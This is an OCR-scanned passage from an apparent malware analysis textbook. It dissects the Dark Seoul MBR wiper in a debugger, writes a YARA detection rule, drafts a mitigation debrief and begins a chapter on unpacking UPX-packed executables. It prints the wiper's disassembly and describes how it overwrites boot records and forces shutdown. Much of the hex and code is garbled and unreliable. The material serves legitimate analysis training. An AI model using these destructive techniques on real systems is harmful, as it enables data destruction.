Onon0004 $0 $2 49 AE 49 $048 S390 $2 40 EAD 5045 8}. pnoncnsmnane 
ONOQOEO4D) S052 49 44) 80 45 59 S082 49 AE 42 $0 4553 PRICPREPACPES Pd 4 
OOOOH MO $249 AE 49 $0 45 $3. $0 S240 AE 4) 9045 8) FRINPESPRICES np “a 
onoooddem go $2 49 AE 4) S045 53.90 $2 49 ME 4) 5045 8). PRONCPSPRONCE: 
(OUD000000 $0 S249 AE 4) 9048.59 9082 49 4-4) $048 8) prIespaancres Mie head 
0000000904 $0 $2 49 AE AD SO 45 $3. 50-50 49-40 43 50.45 83 pROnCrEsentucers Cunt ANA 
OUON00000 $0 5249 AE 4) $045 $0. 5082 49 4840 $045 8H ppmncresmancres Ola dain 
nnnn00036 $0 $2 49 AL 4) $046 $3. $082 40 ME Ab $0 458} pnaneresnnancres jennie ‘et 
WOON 8082 49 AEA) S045 8) 90 S249 AE 4) 90 45 5) PRUCPSPRONCPES dy ; 
wont 90 $249 ALA) $048 $1 $040 49 AE 1 90 48 59 PRNCPSPROICHES dg \ 
onggocgge4 $0 S249 AE 4) 5045 $9 $0 52 49 A 41 $0 45 53. PRINCRSPRINCE: 
OUOOQ0HNO $0 $2 49 AE 49 0 48.59 $0.2 49.484) $048.59 pancresmnncres  Ohhad IRIN wi 
Inononss 0249 AE 4) 80458) 50524944) 50455) PRINPEPROVES toe I w1tabe 
,) ‘ile u Mm UNIVE AUC ANANDA PAL C4 Ta 
ses I tet iio ROR th 
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Thereafter, it enumerates drives and reaches: 





00401CC2 | > C740 >/MOV DWORD PTR DS: 
[EAX-1] ,4E495250 

00401CC9 |. C740 >| MOV DWORD PTR DS: 
[EAX+3] , 45504943 

00401CD0 |. C640 >| MOV BYTE PTR DS: 
[EAX+7] ,53 

00401CD4 |. 83C0 >| ADD EAX,0A 

00401CD7 |. 8D140>| LEA EDX,DWORD PTR DS: 
[ECX+EAX] 

00401CDA |. 3B55 >| CMP EDX,DWORD PTR SS: 
[EBP+8 ] 

00401CDD | .*72 E3 \JB SHORT 
DarkSeou.00401CC2 


CiyDbg - DarkSeoul DO4BO0C96470AR007AD4BISAS62S15C4,ve [CPU thread QOOUEC, module DakSeau) 
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Notice in the preceding exhibit how the string 
values are hex-coded in the binary instructions 
as immediate constants and loaded in EAX 
address offsets; they are derived from the ASCII 
codes in hex from the string 
PRINCIPES.PRINCIPES as 0x4E495250 and 
0x45504943. 





New handles are visible at this point: 





(tyObg = DarkSeoul DOSBODCSEATOAGOO7AD4O1SAS62S15C4,eve = Handles) 
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Repeating the analysis process as we have seen 
until now, a new sequence is being developed: 








00323A22 AB ABABABABAB 00 00 00 00 00 
OOO O43 000 eta tsnya oun a 

00323A32 03 01 6B 07 18 00 50 52 49 4E 
43°49 50) 45 53/0 |i ko. PRINCEPES.. 
00323A42 50 52 49 4E 43 49 50 45 53 BA 
50 52 49 4E 43 49 PRINCIPES.PRINCI 
Q0323A52 50 45 53 FO 50 52 49 4E 43 49 
50 45 53 BA 50 52 PES.PRINCIPES.PR 
00323A62 49 4E 43 49 50 45 53 FO 50 52 
49 4E 43 49 50 45 INCIPES.PRINCIPE 
00323A72 53 BA 50 52 49 4E 43 49 50 45 
53 FO 50°52 49 4E S.PRINCIPES.PRIN 
00323A82 43 49 50 45 53 BA 50 52 49 4E 


43 49 50 
00323A92 
50 52 49 
00323AA2 
50° 45 53 
00323AB2 
49 4E 43 
00323AC2 
53 FO 50 
00323AD2 
43 49 50 
00323AE2 
50: 52 “49 
00323AF2 
50 45 53 
00323B02 
49 4E 43 
00323B12 
53 FO 50 
00323B22 
43 49 50 
00323B32 
50 52 49 
00323B42 
50 45 53 
00323B52 
49 4E 43 
00323B62 
53 FO 50 
00323B72 
43 49 50 
00323B82 
50 52 49 
00323B92 
50 45 53 
00323BA2 
49 4E 43 
00323BB2 
53 FO 50 
00323BC2 
43 49 50 
00323BD2 
50 52 49 
00323BE2 
50 45 53 
00323BF2 
49 4E 43 
00323C02 
53 FO 50 
00323C12 
43 49 50 
00323C22 
50 52 49 
00323C32 


45,53 FO CIPES -PRINCIPES. 
50 52 40° 4E 435° 4950: 45 53 
4E 43 49 PRINCIPES.PRINCI 
50 45 53° FU 50 52°49 4e 43 
BA 50 52 PES.PRINCIPES.PR 
49 4E 43 49 50 45 53 FO 50 
49° 50°45. INCTPES..PRINCIPE 
53 BA 50 52 49 4E 43 49 50 
5249 4E S PRINCIPES..PRIN 
43 49 50 45 53 BA 50 52 49 
453 FO CIPES -PRINCIPES. 
5052 49 46 43° 49° 50: 45.53 
4E 43 49 PRINCIPES. PRINCI 
50 45 53 FO 50 52°49 4E 43 
BA 50°52 (PES:./PRINCIPES PR 
49 4E 435° 49°50 45°53: FO 50 
49°50 45 INCIPES..PRINCIPE 
53 BA 50 52 49 4E 43 49 50 
52 49 4E S.PRINCIPES..PRIN 
43 49 50 45 53 BA 50 52 49 
45 53 0. CIPES: PRINCIPES. 
50 52 49: 4E 43° 49 50: 45.53 
4E 43 49 PRINCIPES.PRINCI 
50 45 53 FU 50 52°49 4e 43. 
BA 50°52 PES. PRINCIPES..PR 
49 4E 43° 49°50 45: 53 FO 50 
49°50 45. INCTPES..PRINCIPE 
53 BA 50 52 49 4E 43 49 50 
5249 4E ‘S. PRINCIPES..PRIN 
43 49 50 45 53 BA 50 52 49 
45 53 FO CIPES -PRINCIPES.. 
50 52 49° 4E 43°49) 50 45. 53. 
4E 43 49 PRINCIPES.PRINCI 
50 45 53 FO 50 52.49 4e 43 
BA 50°52 (PES..PRINCIPES. PR 
49 AE 435° 49 50 45:53 58 50 
49°50 45° INCIPES..PRINCIPE 
53 BA 50 52 49 4E 43 49 50 
52 49 4E S PRINCIPES PRIN 
43 49 50 45 53 BA 50 52 49 
45 53 FO CITPES:.PRINCIPES.. 
50 52 49° 4E 43° 49°50: 45:53: 
4E 43 49 PRINCIPES.PRINCI 
50°45 53 FU 50 52 49 4b 43 
BA 50 52 PES.PRINCIPES.PR 
49 4E 43 49 50 45 53 FO 50 
49 50 45 INCIPES.PRINCIPE 
53 BA 50 52 49 46 43 49 50 
52 49 4E S.PRINCIPES..PRIN 
43 49 50 45 53 BA 50 52 49 
45 53°FO CIPES -PRINCIPES. 
50° 52 49 46 435 49 50 45.53 
4E 43 49 PRINCIPES. PRINCI 
50 45 53 FU 50 52°49 4b 43 


BA 


49 


52 


45 


4E 


BA 


49 


52 


45 


4E 


BA 


49 


52 


45 


4E 


BA 


49 


52 


45 


4E 


BA 


49 


52 


45 


4E 


BA 


49 


50 45 53 AB 00 00: PES. PRINCIPES..... 


00323C42 


00 00 00 00 00 00 77 00 43 00 
EE 14 IEE 00 30° 05 


There is an extra I in the words now. 


The infection on handle 50h, which is drive C:\, 


means that the VBR overwrite changes to: 











hl Sit wc 


Lion ce 
Utne 


Offset (O12 94567 
00000026672) $0 $2 49 4E 4} 49 50 45 
00000028688) $0 45 $3 BA SO $2 49 4E 
00000008704 49 AE 4} 49 $0 45 $3 BA 
00000026720) $3 FO $0 $2 49 aE 43 49 
00000000746) 49 49 50 48 5) FO $0 Se 
00000026752) $0 $2 49 4E 43 49 50 45 
00000026768) $0 45 $3 BA SO $2 49 4E 
00000026784) 49 4E 43 49 $0 45 53 BA 
00000026800) $3 FO $0 $2 49 4b 43 49 
00000028616) 43 49 $0 45 $9 FO $0 $e 
00000026832) $0 $2 49 4E 43 49 50 45 
00000088846) $0 45 5) BA SO $2 49 4 
00000028864) 49 4E 43 49 $0 45 53 BA 
00000028880) $3 FO SO $2 49 4k 43 49 
00000026896) 43 49 $0 45 $9 FO 50 82 
00000026912} $0 $2 49 4E 43 49 50 45 
00000028928) $0 45 $} BA $0 $2 49 AE 
00000026944) 49 4B 43 49 $0 45 53 BA 
00000020960) $3 FO $0 S249 48 43 49 
00000028976) 43 49 $0 45 $3 FO 50 82 
00000028992) $0 $2 49 4B 43 49 50 45 
00000029008) $0 45 $3 BA $0 $2 49 aE 
00000029024) 49 42 43 49 50 45 53 Bh 
00000029040) $3 0 $0 $249 AE 43 49 
00000029056) 43 49 $0 45 $3 FO 50 82 
00000029022 $0 $2 49 AE Ad 49 $0 45 
00000029068) $0 45 $3 BA §0 $2 49 4 
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OOM RS 

5) 10 $0 82 49 AE 43 49 PRINGIPESAPRING 
43 49 50 45 53 70 $0 $2 PEB*PRINCIPESAPR 
$0 $0 49 AE 43 49 $045 INCIPES*PRINGIPE 
$0 45.53 BA 50 $249 AE SOPRINCIPES*PRIO 
4940 49 49 90.45 9) DA CIPRSAPRINGIPES* 
5} FO 50 $2 49.40 43 49 PRINCIPESAPRINCI 
4949-50 45 $1 PO $0 52 POS*PRINCIPESQPR 
$0 $2.49 4E 43 49 $0 45 INCIPES®PRINGIPE 
$0 45 53 BA $0 5249 4E SOPRINCIPES* PRO 
49 40 49 49 $0.45 9) BA CIPESAPRINGIPES* 
5) FO 50 82 49.40 43 49 PRINCIPESAPRINNCT 
4) 49-90 45 $1 70 90 52 PES*PRINCIPRSOPR 
$0 $2.49 4E 43 49 $0 45 INCIPES* PRINCIPE 
$0 45.5) Bh $0 5049 4E SOPRINCTPES* PRO 
49-4043 49 50.45 $9 Bh CIPESOPRINGIPES* 
5) FO 0 §2 49.40 43 49 PRINCIPESMPRINCT 
4} 49 $0 45 $3 70 $0 52 PES*PRINCIPESOPR 
$0 $2.49 4E 43 49 $0 45 INCHPES* PRINCIPE 
40.45 59 BA S052 49 AE SHPRINGZPRS* PRIN 
49°40 43 49 50.45 $) Bh COPESOPRINGIPES* 
$Y FO $0 $2 49-40 43 49. PRINCEPESOPRINCT 
4} 49 $0 45 $3 10 90 50 PES*PRINCIPESOPR 
$0 $2 49 4E 43 49 $0 45 INCHPES® PRINCIPE 
50 45:53 BA 0 50 49 AE SOPRINGEPES*PRIN 
49.40 4) 49 5045 53 BA CIPESAPRINCIPES® 
$) 70 $0 50 49-40 43 49 PRINGIPESOPRINGI 





4} 49 50 45 $3 10 50 52 PES*PRINCIPESSPR 
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The writefile() call happens at: 


00401D1D | > 
00401D1E | 
SS: [EBP-30] 


57 | /PUSH 


8D45 >| | LEA EAX,DWORD PTR 
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00401D21 |. 50 | | PUSH EAX 


00401D22 |. FF75 >|| PUSH DWORD PTR SS: 
[EBP+8 ] 

00401D25 |. 897D >|| MOV DWORD PTR SS: 

[EBP-30],EDI 

00401D28 |. FF75 >|| PUSH DWORD PTR SS: 
[EBP-10] 

00401D2B |. FF75 >|| PUSH DWORD PTR SS: 
[EBP-14] 

00401D2E |. FF96 >|| CALL DWORD PTR DS: 
[ESI+374] ; writefile 

00401D34 |. FF4D >|| DEC DWORD PTR SS: 

[EBP-24] 


00401D37 | .*75 E4 | \JNZ SHORT 
DarkSeou.00401D1D 


It keeps on repeating the infection for a set 
number of cycles depending on the number of 
available drives (it enumerates all available 
drives of the first 10 physical drives, as seen 
previously, and logical drives B:\ to Z:\) and 
success of infection procedures. 


The shutdown function is executed as follows: 


0040211F 
00402120 
00402122 
00402125 
00402126 
[EBP+8] 
00402129 
0040212A 
0040212C 
0040212D 
[ESI+58E] 
00402133 
00402134 
[ESI+394] 
skernel32. 


With parameters: 


BPs. 
2 OBEt 
i OSEC 
7 0 
~ OBIS 


on 
Peeing 
Soe 
. 8D86 


50 
FF96 


WinExec 


PUSH EBP 

MOV EBP; ESP 
>SUB ESP,10 

PUSH ESI 
>MOV ESI,DWORD PTR SS: 


PUSH EDI 

XOR EDI,EDI 

PUSH EDI 
>LEA EAX,DWORD PTR DS: 


PUSH EAX 
>CALL DWORD PTR DS: 


CiyDbg  DarkSeoul OB4B00C96470A007AD4B1SASH2S15C4.eve = [CPU thread O00008%C, module Dark Sou} 











ve oy tose. (static hr | oto | 04  a-in | 


Nopping that part out (select the code area in the 
CPU window, press space, type nop in the dialog 
box, and then press Enter), so that it does not 
execute, we reach: 


0040213A |. 68 10>PUSH 2710 
0040213F |. FF96 >CALL DWORD PTR DS: 
[ESI+354] ; 


kernel32.Sleep 


4 > 


You can change the value in the stack just before 
the call to sleep is made to O to save time. 


Call to LookupPrivilegeVaLue(): 


00402164 |. 8D86 >LEA EAX,DWORD PTR DS: 
[ESI+59F] 
0040216A |. 50 PUSH EAX 
0040216B |. 57 PUSH EDI 
0040216C |. FF96 >CALL DWORD PTR DS: 
[ESI+32C] 
Next: 
0040217A |. FF75 >PUSH DWORD PTR SS: 
[EBP+8] 
0040217D |. C745 >MOV DWORD PTR SS: [EBP- 
Tho eal 
00402184 |. C745 >MOV DWORD PTR SS: [EBP- 
4],2 
0040218B |. FF96 >CALL DWORD PTR DS: 
[ESI+330] ; 
advapi32.AdjustTokenPrivileges 
OO9EFDDO 00402191 /CALL to 
AdjustTokenPrivileges from 
DarkSeou.0040218B 
OO9EFDD4 00000058 | hToken = 00000058 
(window) 
OO9EFDD8 00000000 
| DisableAllPrivileges = FALSE 
QOO9EFDDC OQ09EFE0O | pNewState = 
OO9EFEOO 
OO9EFDEO 00000000 | PrevStateSize = 0 
QOO9EFDE4 00000000 | pPrevState = NULL 
OO9EFDE8 00000000 \pRetLen = NULL 
Finally: 
0040219B |. 68 03>PUSH 80020003 
004021A0 |. 6A 05 PUSH 5 
004021A2 |. FF96 >CALL DWORD PTR DS: 
[ESI+3D0] ; 


USER32.ExitWindowsEx 


If this fails for some reason, ExitThread() is 
called from Kernel32.dll and it is the last 
function to execute. 


On reboot, you get the following message: 


Network boot from AMD AmM?9C978A 


CLIENT MAC ADDR: 88 OC 29 3E 88 31 GUID: 564D54C0-1DB6-50E7-8225-5903853E0831 
PXE-E53: No boot filename received 


PXE-M@F: Exiting Intel PXE ROM. 
Operating System not found 





Network activity 


None. There is no network activity in particular. 


Registry activity 


Nothing particularly malicious (refer to Cuckoo 
Sandboxes reports). 


Yara signatures 


There are six malware samples in the pack 
collected from Contagio dump, so you can try to 
write static as well as generic signatures after 
analyzing each of the malware samples. As a 
preliminary countermeasure, doing this in Yara is 
a breeze with its myriad options to combine text 
and hex strings. After writing the following 
signature, you can run Yara as: 


yara —r <Signature file.yar> <path to 
malware folder> 


This detects all the samples in the pack (sans the 
dropper, which is a separate executable): 


cv C:\WINDOWS\system32\cmd.exe 








The —r switch is for the recursive search mode 
and ds.yar.txt is the signature text file, and is 
shown in the preceding exhibit: 





rule Dark_Seoul_sigtest{ 


meta: 
author="enoryptedmind” 
description="Dark Seoul detection’ 
strings: 
Sstrvall="10840112-CRASB468+-11150923-PC18273V" fulword 
Sstrvald='FFFFFFF198468CD" 
Sstrvald="htp:/Mww.skymom co rtqboardladdon/updatelundate_ body. pg" 
fullword 


Qstrvald="HASTAT fulword 


GOEP = 86 8B EC BEC 34 E8000 0 00 $8 3 EB0B 945 D4 8 
D405 29777778045 F4BB 45 F216] 8045 EC BB 4 D4 8045 DC 83 65 FC 00 
F307} 


condition: 
(Gstrvalt and Sstrval4) or (Sstrval2 or $stval}) and SOEP 





The various parts of the Yara signature are the 
meta section containing metadata or the 
unprocessed text that are name value pairs used 
to annotate the signature and provide additional 
information to the user. The strings section is 
where you write textual and hex-based markers 
as a database of rules, and this is not mandatory 
if you feel that strings are not needed. The 





condition section is where the Boolean 
conditions are implemented taking the data 
available in the strings section to validate a 
positive detection. 


The $0EP identifier uses wild cards and jumps to 
accommodate byte level differences in the 
executable entrypoint code from sample to 
sample. In the other identifiers, the fullword 
modifier is used to enable the whole string to be 
used as a unit or separate word. 


You will find that other parameters from the PE 
headers could also be taken. Timestamp ranges 
are repetitive in the binary. The file size 
meanders around 24,000 bytes mark with 
repeating numbers. Various code sections can be 
wild carded and jump effected to wrap the whole 
collection, especially the hashing functions and 
the payload parts. This can be a good exercise 
for you to enjoy undertaking. 


Finally, while the bulk of the malware has been 
analyzed, be on the lookout for additional 
unreachable code regions that might be 
templates for future variants and double-check 
the percent of code real estate you have covered. 
While this will ostensibly take a lot more 
resources from your end and is very much a trial 
and error method, you can ideally build a 
whiltelist (the majority of the AV vendors have 
this) of legitimate applications and run your 
generic signatures on them to flag any false 
positives. This step will help tune your signatures 
to mark only the malicious code. Just for the sake 
of interest as to the impact of false positives, you 
can search the Internet for news related to AV 
vendors and some of the case stories of how 
customers had to deal with files getting deleted 


off their machines because the AV product thinks 
it is malicious, and the repercussions. Signature 
testing is a serious business inside an antivirus 
company as the stakes are high and it can take 
many hours or even a day or two before they get 
"released" internally toward the final build, with 
lots of staged checks and automated testing 
using machine learning algorithms. The 
signatures themselves are compiled to the 
proprietary binary format of the vendor to speed 
up performance and to prevent IP theft and 
reversing of the sig-database. All in all, make 
judicious use of IDA Pro's FLIRT technology and 
comment out all analyzed code in the IDB 
database. You could also leverage power tools 
such as Zynamics Bindiff and BinNavi to do more 
in-depth analyses if so required and if time 
permits. The code regions in focus can then be 
further analyzed to provide conjecture that may 
be of use in the times ahead. However, remind 
yourself of the point of diminishing returns to the 
amount of continued effort needed and know 
when to call it a day, especially when time is a 
priced commodity and the major scoops are 
taken! 


Another good habit for a malware analyst to 
uphold is to take regular backups of your analysis 
sessions—all samples, notes, screenshots, video 
recordings, and memory dumps can be collected 
in a master folder, named after the malware and 
its hash, annotated and selectively included 
within Scrivener. If permitting, you should take 
online cloud backups of all analysis assets for 
safe storage. This is purely for personal insurance 
and posterity. 


Exorcism and the 
aftermath - debrief 
finale! 


Try to add executive summaries so that the 
technical management has something to talk 
about from your technical analysis. Ideally, do 
some intelligence news gathering from online 
sources or any of your own and give reasons as 
to why you infer that the malware sample is 
malicious (MO?) and to what level. Give a few 
highlights and end with the mitigation measures 
as recommended by your team or as per your 
company guidelines. The following paragraph is a 
simple first draft of what you could possibly note 
down in a more generic manner related to the 
details you got out of this particular analysis 
session. You must also supplement your debrief 
using graphs and statistics if applicable. 


Executive synopsis 


This particular variant of the Dark Seoul malware 
is reported as Wiper A by some security vendors 
in a septet of seven samples collected till date, 
with six being wipers and one being a dropper. 
The other variants are dropped independently 
and their launchers have not yet been 
discovered. 


The file is malicious and has been widely 
reported as an infection in South Korean Banks. 
As we see, structurally the file looks benign and 
is unobfuscated. However, the payloads and 
modus operandi are clear at this point. This MBR 
infector tries to end the Windows session after 


infection. It creates another process and injects 
its code in taskkill.exe. It uses this to search 
for antivirus services of popular Korean AV 
products—AnhLab and Hauri—and terminates 
them. 


The binary initially contains only one import; 
however, we see that more imports are being 
dynamically loaded using PEB traversal. 


Unreachable code is also executed as an internal 
table of function addresses are built and then 
referenced. 


The file not being obfuscated structurally might 
have also made it pass obvious detection using 
entropy and compression/obfuscation as 
malicious indicators. It looks benign, but is in fact 
very malicious. It got detected because 
computers started rebooting and destroying the 
computer by overwriting the MBR, which is being 
detected as a payload. 


Mitigation 


Signatures can be taken from the various static 
offsets of the malware. We already have a 
plethora of unique strings and entire byte 
sequences that can be taken as hex signature. 
Yara signatures can be constructed (see in the 
next segment) and Snort signatures can be built 
for this malware if it is downloaded on the 
network as is without the dropper component 
(the dropper drops trojaned binaries and UPX 
packed files, so the inspection has to be deep or 
else false positives will be generated by the 
detection system). It does not have any network 
activity but it uses a launcher to spread and 
infect, which is distributed separately. 


MBR can be repaired using various boot rescue 
disks. Every antivirus vendor provides one from 
their website and there are third-party and open 
source products as well. For Windows, always 
prepare a live rescue disk for your workstations 
so that the MBR can be repaired in situations like 
this. 


Booting into a Linux Live CD distro will also allow 
you to use utilities such as GParted to 
reconstruct the MBR. You can also use a hex 
editor and manually reconstruct the affected 
areas. 


Most antivirus products detect this malware and 
its various variants. 


Some of the malware functions and in binary 
attributes are like templates and markers, which 
could be for future malware variants, and this 
can be useful for generic signatures. 


At this point, your analysis is complete, and how 
you compile and present your report is 
dependent upon your requirements. You have 
the details, the screenshots, the analyses, and 
the collected information from the sandboxes and 
the web. You can proceed with the other samples 
from the collection and start writing 1:1 (one to 
one) or static signatures, and 1:X (one to many) 
or generic signatures and finding patterns of 
interest, something which will identify the whole 
malware family as the next step ideally. 


Summary 


The preceding demonstration of the malware 
analysis process along with a running 
commentary is something that you will require to 
experience and do it on your own to imbibe 
anything from it. You learned what the 
prerequisites for analyzing malware are and how 
you can set up your own malware lab and 
perform static and dynamic analysis on a 
malware sample. You saw how the various 
features and actions of a malware are recorded 
with the relevant parts of data obtained from the 
analyst's toolkit and you also saw the process of 
how a report can be compiled. Building from the 
earlier chapters, by now you should have a 
strong understanding of the fundamentals of 
computing and bases, the assembly 
programming process and toolchain options, 
compiled data structures, and how they translate 
to assembly code from source code and back, 
static and dynamic analysis concepts, and the 
malware analysis process from fingerprinting a 
malware sample to performing static and 
dynamic analyses, and report generation in 
Scrivener. 


In the next chapter, we will look at some 
emulators, remote debugging, kernel debugging, 
and the Cuckoo sandbox setup and configuration 
to complete your malware analysis lab. 


Chapter 4. Traversing 
Across Parallel 
Dimensions 


Understanding the essentials of dealing with 
packed and encrypted malware is paramount 
when dealing with real world malware. In 
tandem, you should also be able to follow 
malware activity as it goes to and fro between 
the user mode and the kernel mode, or tries nifty 
tricks to be as stealthy or destructive as it can 
be. In this chapter, you will learn the following: 


e The process of unpacking packed binaries 


e Kernel mode debugging with IDA Pro, Virtual KD, and 
VMWare 


« Windows internals concepts 


Compression sacks 
and straps 


The current populous malwares are mostly 
obfuscated, packed, or encrypted to thwart 
detection and impede reverse engineering, 
usually as way to buy more time so that analysis 
will be made redundant if the malware has 
achieved its goals. However, while 
packed/encrypted malwares have telltale signs, 
such as high entropy or PE format anomalies, 
obfuscation can be trickier to detect in the first 
place - undocumented function calls, singular 
call gates, environment aware malware, and 
ingenious methods to bypass both static and 
automated dynamic analysis, among various 
other techniques, are very much in vogue. Some 


foundational unpacking skills are certainly a 
necessity that every malware analyst must be 
well acquainted with. 


Packers such as Ultimate Packer for 
Executables (UPX) are more of executable 
compressors as size reduction is the primary 
goal, not obfuscation, which can be a byproduct 
of customizing the open source code to create 
altered variants. Think of a packer as a bag 
where you tightly pack a pliable executable. After 
packing, all you get to see is the bag and its 
properties, not the executable. However, the 
executable is still intact. Minor obfuscation is a 
side effect of any kind of compression algorithm. 
For UPX using the -d <UPX packed file> switch 
is all you need to get the original executable. 
However, for other packers and even a UPX 
manipulated file, such simple measures will not 
be enough; headers can be corrupted even as 
the packed executable runs properly, multi- 
layered encryption can be employed, process 
memory can be spliced, and imports can be 
destroyed and fragmented in the memory. The 
other variant or approach is a complete virtual 
machine or a bytecode interpreter that can run 
an intermediate language that further translates 
to the native instructions of the original 
executable. The majority of simple to 
intermediate packers mainly deal with an 
unpacking stub in which the entire executable is 
rebuilt from scratch with no semblance to the 
Original binary. This file image, when run, will 
reconstruct the code sections and the imports, 
and transfer the control flow to the OEP, normally 
done by an unpacking stub so that the memory 
image works flawlessly. 


Some of the tell-tale signs of a packed file are a 
reduced number of sections, section raw sizes 
with a zero value but a discrepancy of virtual size 
> 0 indicating a container for the unpacked code 
in memory, multiple section characteristics with 
executable settings, high entropy (discussed in 
Chapter 1, Down the Rabbit Hole) in particular 
sections, high entropy overlays, strange names 
or that of expected packers, spaghetti code, very 
few imports and only the ones used for dynamic 
linking in Windows normally versions of 
LoadLibrary(). 


HMODULE WINAPI LoadLibrary ( 
_In_ LPCTSTR lUpFileName 
); 


HMODULE WINAPI LoadLibraryEx( 


Sane LPCTSTR lpFileName, 
_Reserved_ HANDLE hFile, 
Une DWORD dwFlags 


a 


And GetProcAddress 


FARPROC WINAPI GetProcAddress ( 
_In_ HMODULE hModule, 
_In_ LPCSTR lpProcName 

); 


These occur in sequential pairs or Shel lExecute. 


HINSTANCE ShellExecute( 
_In_opt_ HWND hwnd, 
_In_ opt LPCTSTR lpOperation, 
ce LPCTSTR lpFile, 
_In_ opt LPCTSTR lpParameters, 
_In_opt_ LPCTSITR lpDirectory, 
me Unie INT nShowCmd 

); 


Or WinExec 


UINT WINAPI WinExec( 
_In_ LPCSTR lUpCmdLine, 
_In__ UINT uCmdShow 

); 


And msvcrt system command among a few. 


Releasing the Jack-in-the-Box 


Cracker tools and debuggers can be used to both 
identify and unpack them. PEiD and Exelnfo are 
great for detecting a vast majority of packers. 
Import Reconstructor, commonly known 
ImpRec, is a tool developed for rebuilding import 
tables from process memory of a packed 
executable. You have to use a debugger such as 
OllyDbg to get the memory dump and save it to 
a file image, after which ImpRec will rebuild the 
imports and add a new section to get the binary 
running. For memory dumping, the OllyDump 
plugin is very well recommended. The logic is to 
run the malware or the packed binary till it 
reaches its OEP, after which the imports are 
recalculated based on the in memory code pages 
and their import references rebuilt by the 
unpacking stub. Thereafter, a select number of 
executable memory pages are written to disk and 
the PE headers are adapted to re-accommodate 
the built file. The other approach is to reverse the 
packing algorithm if it can be done by study of 
its algorithm, which can mean writing an 
unpacker from scratch. This approach can be 
undertaken by using APIs such as TitanEngine 
(Reversing Labs) for extensive PE manipulation 
(PackerBreaker is a freeware that also claims to 
work with a lot of packers). Most of the time you 
will have to figure out the OEP yourself, though a 
number of techniques such as section hop 
detection (the OllyBone plugin) are available to 


automate some parts of the process. 
Unfortunately, this is an Al intensive job that 
humans do a lot better than any tool currently, 
though the process can be labor intensive. You 
can script a debugger to break at the OEP and 
then further add to the script to dump the 
sections in memory and automatically run the 
imports gathering algorithm, which can then 
save the final unpacked binary. 


A certain number of patterns emerge after 
looking at various packers. For instance, in UPX 
you have something called a tail jump where the 
OEP is referenced in an ending jmp <hardcoded> 
instruction after the unpakcing stub has run its 
course. With other packers, jmp eax is more 
prevalent. UPX also starts with PUSHAD and ends 
with POPAD sequence, which are some of the 
more commonly used assembly instructions to 
save the registers on the stack and restore them. 
Setting breakpoints at specific APls like the 
GetProcAddress in order to find the exported API 
function or variables addresses. Enabling 
breakpoints on commonly placed APIs such as: 


e GetCommandline: 


LPTSTR WINAPI 
GetCommandLine(void) ; 


« GetVersion: 


DWORD WINAPI GetVersion(void) ; 


« Or GetModuleHandle 


HMODULE WINAPI GetModuleHandle( 
_In_opt_ LPCTSTR ltpModuleName 
i 


This can result in a successful detection of the 
OEP, as most commonly and regularly compiled 


code contains such boilerplates. Remember the 
points discussed in earlier chapters and things 
such as DLL Characteristics bit (Ox2000) in PE 
headers for DLLs and function prologues and 
epilogues that should help you deal with and 
enable finding the OEP a lot easier. However, 
since we would be dealing with malware, do not 
be too surprised to see sequences such as 
Loadlibrary(svchost.exe), which is obviously 
suspicious in a general malware scenario, and in 
this particular malware sample svchost.exe was 
being prepped for process hollowing right after 
the decryption layers. Conditional breakpoints 
are very useful for trapping address range 
changes and classic techniques such as Run 
Trace in OllyDbg can be setup to break at the 
OEP by trial and error. Be prepared to deal with 
the various anti-debugging tricks embedded in 
the malware code while dealing with unpacking. 


Windows virtual memory manager APIs 
VirtualALloc (allocation of memory in a 
specified process, region is set to zero by default 
unless specified otherwise). 


LPVOID WINAPI VirtualAlloc( 
_In_opt_ LPVOID lpAddress, 
In, SIZE T dwSize, 

_In_ DWORD flAllocationType, 
_In_ DWORD flProtect 

); 


VirtualALLlocEx (allocation of memory in 
another process) 


LPVOID WINAPI VirtualAllocEx( 














be Oe HANDLE hProcess, 

In_ opt LPVOID lpAddress, 
ee SIZE T dwSize, 
Sone DWORD flAllocationType, 


eee DWORD flProtect 
); 


VirtualProtect (to specify the memory page 
protection level for the calling process) 


BOOL WINAPI VirtualProtect( 
_In__— LPVOID lpAddress, 
ain SIZECI dwsize,; 

_In_  DWORD flNewProtect, 
_Out_ PDWORD lpflOldProtect 
); 


VirtualProtectEx (to specify the memory page 
protection level in any process) 


BOOL WINAPI VirtualProtectEx( 
_In__— HANDLE hProcess, 
_In__ LPVOID lpAddress, 
cin “SIZEcT dwSize; 
_In_  DWORD flNewProtect, 
_Out_ PDWORD lUpflOldProtect 
); 


And VirtualFree (frees the allocated memory) 


BOOL WINAPI VirtualFree( 
_In_ LPVOID lpAddress, 
_In_ SIZE T dwSize, 
_In_ DWORD dwFreeType 

qs 


These are especially important in terms of 
memory packing and unpacking as a host of 
malicious processes are enabled using these APIs 
(in addition to ancillary API's such as 
WriteProcessMemory, ReadProcessMemory, 
CreateRemoteThread, and other well 
documented API pattern constituents that are 
usually found in malware) from code injection to 
process injection and process hollowing, 
polymorphism as well as a bevy of malware 
packing algorithms make use of this family. Of 


course, you still have to be on the lookout for 
alternate APIs and undocumented native 
interfaces that can be used as they get 
discovered. Keep a sharp eye on malware code 
that makes use of the aforementioned. 


PE Explorer deserves a special mention as it 
automatically unpacks three of the most common 
packers and its plugin framework can be 
leveraged for writing the unpackers. You simply 
drag and drop the binary and start analyzing the 
sample unpacked right at the outset. Nice! 





w PE Explorer - C:\Users\user\Desktop\UPD,exe 


File View Tools Help 


Br gis| W| PER) DART Ad] P4SV¥] @ 





| 9) 
PV. @ Plug-in Manager 
Oh 
gg |, Plugin Name Prioty Fle Name: unnspack. dl 
© NePack Unpacker Plugin 1 —, 
© Upack Unpacker Plugin 1 Set poly . 
© UPR Unpacker Pugin | Note: Larger values have areater 
priority. Zero disables the plugin. 
Libr. 
3 
fun GetCurrentProcess1 


Close Help 











Let us look at manual UPX unpacking as an 
example: 


1. Write the following code in VC++: 


#include "stdafx.h" 
#include <conio.h> 


int tmain(int argc, _TCHAR* 
argv[]) 
{ 
printf("Hello World UPX!"); 
getchar(); 
return 0} 


2. Name the file as Hel LoWorldUPX. exe. 

3. Download UPX from 
http://upx.sourceforge.net/#downloadupx. 

4. Unzip UPX and run with the following options, given UPX 
and the original binary are in the same directory: 


Upx. exe -9 -vfk -o UPD. exe 
HelloWorldUPX. exe 





5. Run the UPX'd version to check if it works. Now we can 
start the unpacking process. 


ne PEID v0.95 - Oo 





File: [C:\Users\user Desktop\PD.exe 7S] 
Entrypoint: {00007910 EP Section: [UPX1 > 
Fie Offset: 00000010 First Bytes: (60,BE,00,70 | > 
Linker Info: |9.0 Subsystem: | Win32 console 
Nothing found * 


